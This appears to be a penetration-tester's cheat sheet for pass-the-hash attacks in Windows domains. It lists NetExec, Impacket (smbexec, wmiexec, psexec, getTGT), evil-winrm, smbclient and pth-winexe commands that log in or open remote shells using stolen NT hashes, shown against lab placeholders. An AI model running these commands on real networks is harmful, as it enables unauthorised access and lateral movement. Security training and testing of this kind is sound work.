Pass the Hash
Overview
Dumped the SAM or LSA and now have hashes for domain or a local users. Use the hash and nxc to pass it around the network and see if we can log into any other target(s) with that credential
Anatomy of a Windows Hash
username:SID:LM_HASH:NT_HASH::- The LM hash is stored for backward compatibility
- The NT hash is used when authenticating to server by IP address or unregistered hostname
- Otherwise, Kerberos is likely going to be used
NetExec
nxc smb <target-or-CIDR> -d 'domain.tld' -u "username" -H NT_HASHUse the hash of a domain user
nxc smb <target-or-CIDR> -u "username" -H NT_HASH --local-authUse the hash of a local user account (not a domain account)
Impacket Suite
Kali Linux developers have created a series of wrappers around Impacket scripts. In most cases, you can run impacket-scriptName -- e.g. impacket-getTGT -- to invoke getTGT.py. In any case, you can find the original Impacket scripts under /usr/share/doc/python3-impacket/examples/.
impacket-smbexec
impacket-smbexec -hashes ':NT_HASH' 'domain.tld/username@target'impacket-smbexec wrapper on Kali Linux
impacket-wmiexec
impacket-wmiexec -hashes lm-hash:nt-hash 'domain.tld/username@target' cmd.exe impacket-wmiexec wrapper on Kali Linux
impacket-psexec
impacket-psexec -hashes lm-hash:nt-hash 'domain.tld/username@target' cmd.exeimpacket-psexec wrapper on Kali Linux
impacket-getTGT
Overpass-the-Hash -- use the NT hash to request a Kerberos ticket
impacket-getTGT -dc-ip 10.80.80.2 -hashes :NT_HASH_HERE 'ad.lab/john.doe'@DC01.ad.labNow in possession of user TGT, see also:
WinRM
- WinRM over HTTP –
TCP/5985 - WinRM over HTTPS –
TCP/5986
evil-winrm -i <target_ip> -u username -H <hash>smbclient
smbclient -U 'AD.LAB/john.doe%NT_HASH' --pw-nt-hash -L //filesrv01.ad.labPass john.doe NT hash and list shares on filesrv01 host
Passing-the-Hash Suite
pth-winexe
pth-winexe -U 'domain.tld/username%lm-hash:nt-hash' cmd.exe